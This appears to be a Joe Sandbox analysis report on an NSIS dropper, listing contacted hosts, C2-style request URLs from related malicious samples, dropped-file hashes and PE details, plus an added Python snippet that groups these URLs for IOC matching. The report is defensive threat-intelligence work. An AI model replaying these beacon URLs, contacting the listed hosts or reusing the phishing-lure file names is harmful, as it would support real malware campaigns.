81.169.145.72 | missjeschickt.com | Germany | 6724 | STRATOSTRATOAGDE | true
34.102.136.180 | fibermover.com | United States | 15169 | GOOGLEUS | false
169.1.24.244 | www.swashbug.com | South Africa | 37611 | AfrihostZA | true
52.15.160.167 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
213.171.195.105 | www.hispekdiamond.com | United Kingdom | 8560 | ONEANDONE-ASBrauerstrasse48DE | true

                                                                            Private

IP: 192.168.2.1

                                                                            General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385309
Start date: 12.04.2021
Start time: 10:04:36
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 39s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: NdBLyH2h5d.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@15/11
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.1% (good quality ratio 25%)
• Quality average: 75.8%
• Quality standard deviation: 30.3%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 92.122.145.220, 104.42.151.234, 40.88.32.150, 184.30.24.56, 20.82.210.154, 13.64.90.137, 8.241.79.126, 8.241.78.254, 8.241.83.126, 8.238.28.254, 8.241.89.126, 92.122.213.247, 92.122.213.194, 20.54.26.129, 104.43.193.48, 20.82.209.183, 172.67.212.56, 104.21.53.110
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.borderlesstrade.info.cdn.cloudflare.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            No simulations

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            45.142.156.44jEXf5uQ3DE.exeGet hashmaliciousBrowse
                                                                            • www.6927199.com/a6ru/?vRiX0=NhNiaHOKHVQfGN0YY99wJ58IE9WzqrmHm9WDer2yilaxrU8do+EbPhhYqdpc+7/sehz43PMCcQ==&OhNl7=9rXdXRPXHBu
                                                                            Purchase Order.xlsxGet hashmaliciousBrowse
                                                                            • www.5915599.com/aqu2/?iL08e=Qu/SGATmsILkb3T/nQH1K+vXdQVupUmj3KZ2bTO1zlh5Ph/Ej23U53EZ4HzzSPUSLaFwlw==&2d2=XxlLiZV
                                                                            dot.dotGet hashmaliciousBrowse
                                                                            • www.7985699.com/nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0
                                                                            SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                            • www.6927199.com/a6ru/?9rT=ablpdH&DvRxvP=NhNiaHOKHVQfGN0YY99wJ58IE9WzqrmHm9WDer2yilaxrU8do+EbPhhYqdlctrzvHxzu
                                                                            Scan-45679.exeGet hashmaliciousBrowse
                                                                            • www.3931799.com/gwam/?Bjq=WBcASaJCttsXosCQsrWbmBSs+tmmydGShEGHgXg6pwkkYqVCVVlIvyOdwkU76G9CTRE5&Efzxz2=2dut_L3xNbOxThN
                                                                            Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                                            • www.5915599.com/aqu2/?8pdLW0th=Qu/SGATjsPLgbnfzlQH1K+vXdQVupUmj3KBmHQS03Fh4PQTCkmmYvz8b7ifPJvghEbQA&axo=tVBlCVNXaRgL
                                                                            MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                            • www.6987599.com/rrrq/?Qtu=0vETm3tpTz/JBz7myerFMJmtxuQinZwH/yTouEotDJa3Xdwt/k/0k/t75VQdQCQAjPnK&D8Lt7=AbilnzdhCdPTRfM
                                                                            shipping document008476_pdf.exeGet hashmaliciousBrowse
                                                                            • www.5996399.com/xgxp/?Dxlpd=cJE0&Ybcx-VVp=Xu1DQjTJJhmglDyHbFvDt9q0tpf8gcpJJQnfBxbnS7whiZxllJdbVZRKcXEP+d7oIOuv
                                                                            Swift_Payment_jpeg.exeGet hashmaliciousBrowse
                                                                            • www.3991799.com/09rb/?t8bL=mtOT66Wi3D6giMtbRcSTtfK33xC0G/9sULI8vKPJ3WYoXH3DAPX23CnZiOHbu4P1xNSn&2d=llsp
                                                                            IRS_Microsoft_Excel_Document_xls.jarGet hashmaliciousBrowse
                                                                            • www.3991799.com/09rb/?Qzr=mtOT66Wi3D6giMtbRcSTtfK33xC0G/9sULI8vKPJ3WYoXH3DAPX23CnZiOHxxI/11Pan&uZUX=MXEXxL
                                                                            23.227.38.744oItdZkNOZ.exeGet hashmaliciousBrowse
                                                                            • www.recovatek.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw==
                                                                            PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                            • www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8
                                                                            Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                            • www.worldsabroad.com/hx3a/?qJE0=ByCcBdCDA9ynDZ0p2mvosMnRVFdtAJOL45GnySkY7pv3UdFI4qVYyr3+Nz+s3xG49ZTQ7g==&MFNTHp=zXaxujox
                                                                            winlog.exeGet hashmaliciousBrowse
                                                                            • www.tagualove.com/uwec/?uzu8=4lE6ePOjgVOxQbKwmPb1ExKNrZ9hSDAusM8u/5C1B85TxEFkqvNdXJuLoKP4GsHywYGm&NjQhkT=8p44gXmp
                                                                            36ne6xnkop.exeGet hashmaliciousBrowse
                                                                            • www.essentiallyourscandles.com/p2io/?1bVpY=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&TVg8Ar=tFNd1Vlhj2qp
                                                                            Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                                            • www.rideequihome.com/iu4d/?jBZ4=dYMXTz3oQAQLkNaLcUxsUovqIEfQQMeG6VLojiGd9Hw1vsxtxl1xN3dYL0Oy7pqqR6f8&1bz=WXrpCdsXv
                                                                            giATspz5dw.exeGet hashmaliciousBrowse
                                                                            • www.squeakyslimes.com/a6ru/?OtZhTl=wZOPRxK8tpyPd&KzuD=lfMB28QesiJBcE5BXZRwN/zOtPplnlykGnT8TD32dw805CVoyQ8xbgtvqYaGqJpCt+n4lE3Dhg==
                                                                            IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                            • www.recovatek.com/hx3a/?df=fCmUcBRkMsU23gyon11B/xiypSW2fUD8cUjfy08rELK4cGFPgnyxy77uL+u9ezJOoCatMA==&rJ=w0G8E6
                                                                            HG546092227865431209.exeGet hashmaliciousBrowse
                                                                            • www.dollfaceextensionsllc.net/ct6a/?j2JHaJc=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA70CqXfonfR76&KthHT=LXaP
                                                                            Ref. PDF IGAPO17493.exe (malicious)
                                                                            • www.trendyheld.com/edbs/?BbW=d74BDEXnxoADciMbQzj0eCjrMELcvf+wOrQFljwVZdGJg+vXDTJsALwkgrXDTrto9sU7&blX=yVCTVP0X
                                                                            pumYguna1i.exe (malicious)
                                                                            • www.essentiallyourscandles.com/p2io/?uFNl=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&-ZSXw=ctxh_fYh
                                                                            0BAdCQQVtP.exe (malicious)
                                                                            • www.busybeecreates.com/bei3/?8p=EZa0cv&2d=OGWfJfpUnHsdThEHHqOdnDkqqSd1vNA2rxr/ypdVXp7lfSasz7bxTgAFATjYM0d9Yd+JVdPS6Q==
                                                                            TazxfJHRhq.exe (malicious)
                                                                            • www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu
                                                                            AQJEKNHnWK.exe (malicious)
                                                                            • www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD
                                                                            payment.exe (malicious)
                                                                            • www.moxa-pro.com/bei3/?Rl=M48tiJch&M4YDYvh=y7EZsd/VU66W5EPJYwX5Xfv+3DSZx1f1d6WAR6GRDy2o8Omo0ZsYhDvN6jXI6rbTZYPD
                                                                            Order.exe (malicious)
                                                                            • www.woofytees.com/cugi/?BlL=guBtZ9/BZLKg3V3RSdvXg/8z1FJ37mZkFho76YC6dYQSBoV8kgYAqcCQ9vWS/DgnoPIa&EZXpx6=tXExBh8PdJwpH
                                                                            PO91361.exe (malicious)
                                                                            • www.thegreenbattle.com/sb9r/?j2JhErl=WUvo38J/IHQ2cZDNQTpzQUKmli8iSC3X7FmX7RGR1rjI+erccOscsvK8+mo5h+9Qwsc2&NXf8l=AvBHWhTxsnkxJjj0
                                                                            RFQ11_ZIM2021pdf.exe (malicious)
                                                                            • www.yourdadsamug.com/hmog/?U48Hj=FlcsoMQcYP8bHmq4bYup7jQaOgohKV4/DEyixY4WMPM8LbmuXu036xGPxLAWg/kNnOBQ&wP9=ndsh-n6
                                                                            1517679127365.exe (malicious)
                                                                            • www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA73iQHOIfF2a9
                                                                            W88AZXFGH.exe (malicious)
                                                                            • www.oouuweee.com/klf/?VPXl=btTL_&ojPl=MYGgbBKqv4+u3e/kdP2Xd91vi4RM/aoA3smYuNxu5fW82Y1Oa+7PC+KK+eq77k+PBZt4nUhikw==
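The context rows above all have one shape: a host, a short directory, and a query string of two opaque parameters. The same host and directory recur with different parameter names (www.essentiallyourscandles.com/p2io/ appears with 1bVpY and with uFNl; www.dollfaceextensionsllc.net/ct6a/ with j2JHaJc and with YP), so the pivot that holds across samples is host plus directory, not the full URL and not the parameter names. The Python below is an added example, not code from Joe Sandbox or from this report; its URL list is constructed in that shape (hostnames taken from the table, placeholder query values) and is not captured traffic.

```python
"""Pivot FormBook-style C2 request rows (as listed in sandbox context
tables) on host + directory rather than on the full URL.

Added example. SAMPLE_ROWS is constructed for illustration in the shape of
the report's rows: real hostnames from the table, placeholder query values.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample rows: no scheme, directory path, two query parameters
# with opaque values, exactly the shape of the report's context column.
SAMPLE_ROWS = [
    "www.essentiallyourscandles.com/p2io/?1bVpY=QUJDREVG&TVg8Ar=tFNd1Vlhj2qp",
    "www.essentiallyourscandles.com/p2io/?uFNl=QUJDREVG&-ZSXw=ctxh_fYh",
    "www.dollfaceextensionsllc.net/ct6a/?j2JHaJc=R0hJSktM&KthHT=LXaP",
    "www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=R0hJSktM",
    "www.recovatek.com/hx3a/?df=TU5PUFFS&rJ=w0G8E6",
]


def parse_row(row: str) -> dict:
    """Split one context row into host, directory path and query parameter names.

    Rows carry no scheme, so one is prepended purely so urlsplit() sees a
    netloc; the parser does not otherwise depend on it. Query values are
    deliberately not decoded (they contain '+' and '/' that parse_qsl would
    mangle) because only the parameter names are used.
    """
    parts = urlsplit("http://" + row)
    path = parts.path or "/"
    if not path.endswith("/"):
        # Keep the directory, drop a trailing file name such as index.php.
        path = path.rsplit("/", 1)[0] + "/"
    names = [kv.split("=", 1)[0] for kv in parts.query.split("&") if kv]
    return {"host": parts.netloc.lower(), "path": path, "params": names}


def ioc_key(row: str) -> str:
    """Pivot key: host plus directory, the part stable across samples."""
    p = parse_row(row)
    return p["host"] + p["path"]


def group_rows(rows) -> dict:
    """Map each host+directory key to the sorted parameter names seen with it."""
    seen = defaultdict(set)
    for row in rows:
        p = parse_row(row)
        seen[p["host"] + p["path"]].update(p["params"])
    return {k: sorted(v) for k, v in seen.items()}


def matches_known(row: str, keys) -> bool:
    """True when a new request shares host+directory with a known key (query ignored)."""
    return ioc_key(row) in set(keys)


if __name__ == "__main__":
    groups = group_rows(SAMPLE_ROWS)
    for key, names in groups.items():
        print(f"{key}  parameter names seen: {', '.join(names)}")
    print(matches_known("www.recovatek.com/hx3a/?zz=1&yy=2", groups))
```

Keying on host plus directory also survives the per-session query values that the full URL carries; checking a fresh proxy log entry against the key set is a single set lookup, and the per-key parameter-name list shows how much the names drift between samples.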

                                                                            Domains

                                                                            Columns: match, then for each associated sample its name / URL (detection) followed by the context it shares with the match.

                                                                            Match: prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
                                                                            g2qwgG2xbe.exe (malicious)
                                                                            • 52.15.160.167
                                                                            winlog.exe (malicious)
                                                                            • 3.14.206.30
                                                                            1ucvVfbHnD.exe (malicious)
                                                                            • 3.13.255.157
                                                                            Wire Transfer Update.exe (malicious)
                                                                            • 3.13.255.157
                                                                            LtfVNumoON.exe (malicious)
                                                                            • 52.15.160.167
                                                                            giATspz5dw.exe (malicious)
                                                                            • 52.15.160.167
                                                                            Customer-100912288113.xlsx (malicious)
                                                                            • 52.15.160.167
                                                                            New order.exe (malicious)
                                                                            • 3.14.206.30
                                                                            qRsvaKcvxZ.exe (malicious)
                                                                            • 3.14.206.30
                                                                            PO-RFQ # 097663899 pdf .exe (malicious)
                                                                            • 52.15.160.167
                                                                            PO45937008ADENGY.exe (malicious)
                                                                            • 52.15.160.167
                                                                            Calt7BoW2a.exe (malicious)
                                                                            • 3.14.206.30
                                                                            TazxfJHRhq.exe (malicious)
                                                                            • 52.15.160.167
                                                                            8sxgohtHjM.exe (malicious)
                                                                            • 3.13.255.157
                                                                            vbc.exe (malicious)
                                                                            • 3.13.255.157
                                                                            Order Inquiry.exe (malicious)
                                                                            • 3.14.206.30
                                                                            PaymentAdvice.exe (malicious)
                                                                            • 3.14.206.30
                                                                            BL01345678053567.exe (malicious)
                                                                            • 3.14.206.30
                                                                            Shipping Documents.xlsx (malicious)
                                                                            • 3.14.206.30
                                                                            TACA20210407.PDF.exe (malicious)
                                                                            • 3.13.255.157

                                                                            Match: k9cdna.51w4.com
                                                                            jEXf5uQ3DE.exe (malicious)
                                                                            • 45.142.156.44
                                                                            Purchase Order.xlsx (malicious)
                                                                            • 45.142.156.44
                                                                            dot.dot (malicious)
                                                                            • 45.142.156.44
                                                                            SwiftMT103_pdf.exe (malicious)
                                                                            • 45.142.156.44
                                                                            Scan-45679.exe (malicious)
                                                                            • 45.142.156.44
                                                                            Y79FTQtEqG.exe (malicious)
                                                                            • 45.142.156.44
                                                                            MACHINE SPECIFICATION.exe (malicious)
                                                                            • 45.142.156.44
                                                                            shipping document008476_pdf.exe (malicious)
                                                                            • 45.142.156.44
                                                                            Swift_Payment_jpeg.exe (malicious)
                                                                            • 45.142.156.44
                                                                            IRS_Microsoft_Excel_Document_xls.jar (malicious)
                                                                            • 45.142.156.44
                                                                            uM0FDMSqE2.exe (malicious)
                                                                            • 45.142.156.43
                                                                            оферта за поръчка.exe (malicious)
                                                                            • 45.142.156.48
                                                                            HussanCrypted.exe (malicious)
                                                                            • 45.142.156.48
                                                                            Mediform S.A Order Specification Requirement.xls.exe (malicious)
                                                                            • 45.142.156.48
                                                                            Mediform Order Specification Requirement.xls.exe (malicious)
                                                                            • 45.142.156.48

                                                                            ASN

                                                                            Columns: match (ASN name and country), then for each associated sample its name / URL (detection) followed by the context it shares with the match.

                                                                            Match: AS-26496-GO-DADDY-COM-LLC (US)
                                                                            4oItdZkNOZ.exe (malicious)
                                                                            • 107.180.50.167
                                                                            Portfolio.exe (malicious)
                                                                            • 72.167.241.46
                                                                            12042021493876783,xlsx.exe (malicious)
                                                                            • 184.168.131.241
                                                                            CIVIP-8287377.exe (malicious)
                                                                            • 184.168.177.1
                                                                            MT103_004758.exe (malicious)
                                                                            • 184.168.131.241
                                                                            Payment advice IN18663Q0031139I.xlsx (malicious)
                                                                            • 184.168.131.241
                                                                            Swift002.exe (malicious)
                                                                            • 50.62.160.230
                                                                            36ne6xnkop.exe (malicious)
                                                                            • 184.168.131.241
                                                                            56UDmImzPe.dll (malicious)
                                                                            • 107.180.90.10
                                                                            Shipping doc&_B-Landen.exe (malicious)
                                                                            • 50.62.137.41
                                                                            Statement-ID261179932209970.vbs (malicious)
                                                                            • 148.72.208.50
                                                                            _.ryder.com._1602499153.666014.dll (malicious)
                                                                            • 166.62.30.150
                                                                            mW07jhVxX5.exe (malicious)
                                                                            • 184.168.131.241
                                                                            jEXf5uQ3DE.exe (malicious)
                                                                            • 184.168.131.241
                                                                            giATspz5dw.exe (malicious)
                                                                            • 184.168.131.241
                                                                            cV1uaQeOGg.exe (malicious)
                                                                            • 107.180.50.167
                                                                            documents-351331057.xlsm (malicious)
                                                                            • 173.201.252.173
                                                                            documents-351331057.xlsm (malicious)
                                                                            • 173.201.252.173
                                                                            documents-1819557117.xlsm (malicious)
                                                                            • 173.201.252.173
                                                                            documents-1819557117.xlsm (malicious)
                                                                            • 173.201.252.173

                                                                            Match: CNSERVERS (US)
                                                                            PAYMENT COPY.exe (malicious)
                                                                            • 23.225.41.92
                                                                            Swift002.exe (malicious)
                                                                            • 23.225.197.29
                                                                            jEXf5uQ3DE.exe (malicious)
                                                                            • 45.142.156.44
                                                                            Purchase Order.xlsx (malicious)
                                                                            • 45.142.156.44
                                                                            Statement Of account.exe (malicious)
                                                                            • 45.205.60.183
                                                                            dot.dot (malicious)
                                                                            • 45.142.156.44
                                                                            NEW ORDER - BLL04658464.exe (malicious)
                                                                            • 154.198.253.11
                                                                            New Order.exe (malicious)
                                                                            • 23.225.41.18
                                                                            BL836477488575.exe (malicious)
                                                                            • 172.247.179.61
                                                                            B of L - way bill return.exe (malicious)
                                                                            • 154.198.253.11
                                                                            SwiftMT103_pdf.exe (malicious)
                                                                            • 45.142.156.44
                                                                            Request an Estimate_2021_04_01.exe (malicious)
                                                                            • 154.198.196.146
                                                                            xpy9BhQR3t.xlsx (malicious)
                                                                            • 192.161.85.138
                                                                            Scan-45679.exe (malicious)
                                                                            • 23.225.141.130
                                                                            BIOTECHPO960488580.exe (malicious)
                                                                            • 172.247.179.61
                                                                            Y79FTQtEqG.exe (malicious)
                                                                            • 45.142.156.44
                                                                            IMG001.exe (malicious)
                                                                            • 23.225.141.130
                                                                            Po # 6-10331.exe (malicious)
                                                                            • 154.88.22.37
                                                                            MACHINE SPECIFICATION.exe (malicious)
                                                                            • 45.142.156.44
                                                                            Invoice #0023228 PDF.exe (malicious)
                                                                            • 154.91.159.195

                                                                            Match: CLOUDFLARENET (US)
                                                                            4oItdZkNOZ.exe (malicious)
                                                                            • 23.227.38.74
                                                                            ieuHgdpuPo.exe (malicious)
                                                                            • 104.21.17.57
                                                                            Cobro Juridico_0420198202_326828_4985792583130360_300690_8122300886764676459_5190713730838_pdf.exe (malicious)
                                                                            • 172.67.222.176
                                                                            Payment Slip.doc (malicious)
                                                                            • 104.21.17.57
                                                                            Cobro Juridico_0291662728_7023446_452487041454723_016698_5192136884256735776_2301761820735_pdf.exe (malicious)
                                                                            • 104.21.17.57
                                                                            INQUIRY 1820521 pdf.exe (malicious)
                                                                            • 104.21.82.58
                                                                            PaymentCopy.vbs (malicious)
                                                                            • 172.67.222.131
                                                                            PAYMENT COPY.exe (malicious)
                                                                            • 104.21.28.135
                                                                            PO NUMBER 3120386 3120393 SIGNED.exe (malicious)
                                                                            • 1.2.3.4
                                                                            Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exe (malicious)
                                                                            • 172.67.222.176
                                                                            BL2659618800638119374.xls.exe (malicious)
                                                                            • 172.67.222.176
                                                                            Purchase order and quote confirmation.exe (malicious)
                                                                            • 172.67.222.176
                                                                            Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exe (malicious)
                                                                            • 172.67.188.154
                                                                            Re Confirmÿthe invoiceÿthe payment slip.exe (malicious)
                                                                            • 104.21.17.57
                                                                            SOA.exe (malicious)
                                                                            • 104.21.19.200
                                                                            RFQ No A'4762GHTECHNICAL DETAILS.exe (malicious)
                                                                            • 104.21.19.200
                                                                            GQ5JvPEI6c.exe (malicious)
                                                                            • 104.21.17.57
                                                                            setupapp.exe (malicious)
                                                                            • 172.67.164.1
                                                                            g2qwgG2xbe.exe (malicious)
                                                                            • 172.67.161.4
                                                                            C++ Dropper.exe (malicious)
                                                                            • 104.21.50.92

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\kujd8v16w3b9lgr
                                                                            Process:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):164864
                                                                            Entropy (8bit):7.998914918090413
                                                                            Encrypted:true
                                                                            SSDEEP:3072:mtsl0UDwDZ6jnJ+vmebKkjgiuK5svdujBO1niLCA0RvNbBorABqGMWt9:medJjkvxKvMCA0TirvGL
                                                                            MD5:E83FC0EE2B9E83A097B116CB29EF1959
                                                                            SHA1:89B3F8182EC630FE17642466E446D39CE6BE5315
                                                                            SHA-256:0049A5567B1B77E56ED32450A5531B2DC76B852CE760BA10ADA60CE9E71375A0
                                                                            SHA-512:EE14F870316B77B8D6FBF8366171B11B39B08B34F4703C6240C90E08956C56AD8C80CB09C3D1832F965C5445AA4F0E30652FF312610EEBF7DC3B881EC512FD6C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: ..,......\....e..T/b..."f...&{...q=....}]lw2..k^..xt..9v~6)N.._......u..W.M.........[<2.".J..J...@.T..&....Z..Q.....NF..Q.&.|.8z?..........|.3.....U.I{FD.m*......<F...Ge.....E....'1...D7..l.{.O4..T.]....B.d1.J..'u..nh...`MP..b....B.7.E.o..q?....;.. ...X7.!.z}m%..~@........\..?G..s......B.Y._.(s7J@..q.B.I0.....b;.......{<...9sR......,...:.m....U.d.L..FQ....t/.!lxX....\Hw....)w..B..?.+h.l........1.R.i..DBB.pz.^"......g.,.hE.....{..."...a..[6{......Y.?:....{.vZ ...9...$....t>....u..I.t.&.I.......G\(...q..{...:}....T........._.$...6..........6"&......0;....c._+.....-.,......T&...G..c...t.:j.(e.......r.u}...%D...h...?rB.N%?.....u....._Z....9.x...,..N:+>...H.C..,#.L...mUM...e..^.r.....&..2.b!. .h....W.+...<v.X.*./bz...b.....70....P._...x.\.. ....`.....E.|...p+......T.. .~<.\/s.....N8:...2...2:c...j(..:.Q"...O..@..r.pn.~....f<.$}..z..Esl....}:]....MS..3.....U*e,.~..1.(.59..L...W.....B>l........V...&..n+.8...z.....A./....W..E.....O.......]....V.I...N..`'..h
                                                                            C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                            Process:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5632
                                                                            Entropy (8bit):4.076385816391399
                                                                            Encrypted:false
                                                                            SSDEEP:48:a97y+GI2M5gcWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqSiMy:1QOj4IGN4/GCBKxfQKuixv
                                                                            MD5:C9336787DFDAFEB728B854D5B0137027
                                                                            SHA1:DF3AD91DA915FD81FDA8238B49DA7F8428CD68F9
                                                                            SHA-256:2FD494E3A53E62F5E4658D2DDD0AE20647933F7ACB0CC0E7DC834CA128AB6D7F
                                                                            SHA-512:68683812E8B0BF21295C9B475B4A4D2207ADA6A1994E8409005B2B27668889D042E8D718E3DCC73D316316736888C7E93B101CA502A3B4B977136D16328431EB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L....s`...........!......................... ...............................`............@.........................@ ..P....1.......@.......................P...... ...............................................0...............................code... ........................... ....data...l.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\ur15t24pnyduhs
Process: C:\Users\user\Desktop\NdBLyH2h5d.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.961933784328945
Encrypted: false
SSDEEP: 192:AwW3PWDSp3fuLJLNdsgASFuwS+h0F5xlkeKHP:3tO6Tr4wSc0F5XkfP
MD5: 52F75799779AB035150433B39CE1013C
SHA1: 7845564CC833DF8A37F6B1603481F036C23EB633
SHA-256: 9CD94A2C53E7C3CA35926F96E1F45833C6841E4AF5335B65A5E16D504A074AB6
SHA-512: 6D58364D5D9949427D7C66A38BB9840576E2446D30E74B4C19C42A95A14C9B45DDB474257E4D00D43BA2EDD6F69A341EB2AE11ACDE558877F898B6CB8C505521
Malicious: false
Reputation: low
                                                                            Preview: .u*...kf..w`.L.b.P..^2vB:[..?..I...&..o...:.^|Z.mE.ze.lN.x.M.+...@.....$s.....In.~*..p.e.'a..........|.0e....AT.0...vQ.....?.(Ij&i...p.e..q..K.....K).]...3..T.....bA...!.K.P..J..f+..f.&H.....)....v...j..A.*.M..........T\.e8..}..}B.$....i.B.d.}.Q...U7.5.D9....s.....]..C.n......r..'..A....gD...5.^.O..W}..g}p.2n..B.(p=..9...V.k..;a...Z.{\.....BI[:.S..i..T....X.>c._....:.Z.6..'.y.)%&Gd...Y.Lo.v..z..c.......E....7....J.dJ.[.fy.......(8A....+..L.....2&O..c.|U.r8...-..u hX/9h._ i..8't...m,~.....^q....r.-?......5%.../`6..C...T-l.....Z$..E...T.lOQ6.+$.B..V..3-U....q..X..R..-;S.Be..p.hP{..+.r...N2T..;.R6....`.3.~...(IG...tVx1[......Dec.W.-L...Cv"......_.bA/...5..X..w.K.....9/K.i$=.o-8A..;..!..b1s.3H.w$..{.^h........d.kv.Mz+.N^.u..5.7.X_.....r.A+...B.....:[..?....$C.&vw0.j5......d.........2..z..WZ..n...._yF<...n..+.S.Ce...I.{\.6.....{Z..h_.}C[X..g-.Q0!....D.Ij...(G.z.d.q.....}.B8..Lo....3[.V.>..$L...TW..2.I.7y......F....T.z.....x......Q..3.du..*.)..

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.904825034789928
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: NdBLyH2h5d.exe
File size: 207111
MD5: 3fef6985af0d52ab6701df170096b504
SHA1: ac8db3220c960262f8e666eae676066cec541b3a
SHA256: a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
SHA512: e2cfc5465a281dbe65152d21e6a1250559e042c59eb8c313a4cae8c4846fb5e998f83d74e97122ba01c63dd10c052a1c6137c85dfe6f6abd9f7894d8811319c4
SSDEEP: 3072:HyewmN4skJ6VtZmtsl0UDwDZ6jnJ+vmebKkjgiuK5svdujBO1niLCA0RvNbBorAC:HddmedJjkvxKvMCA0TirvG6t
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40314a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
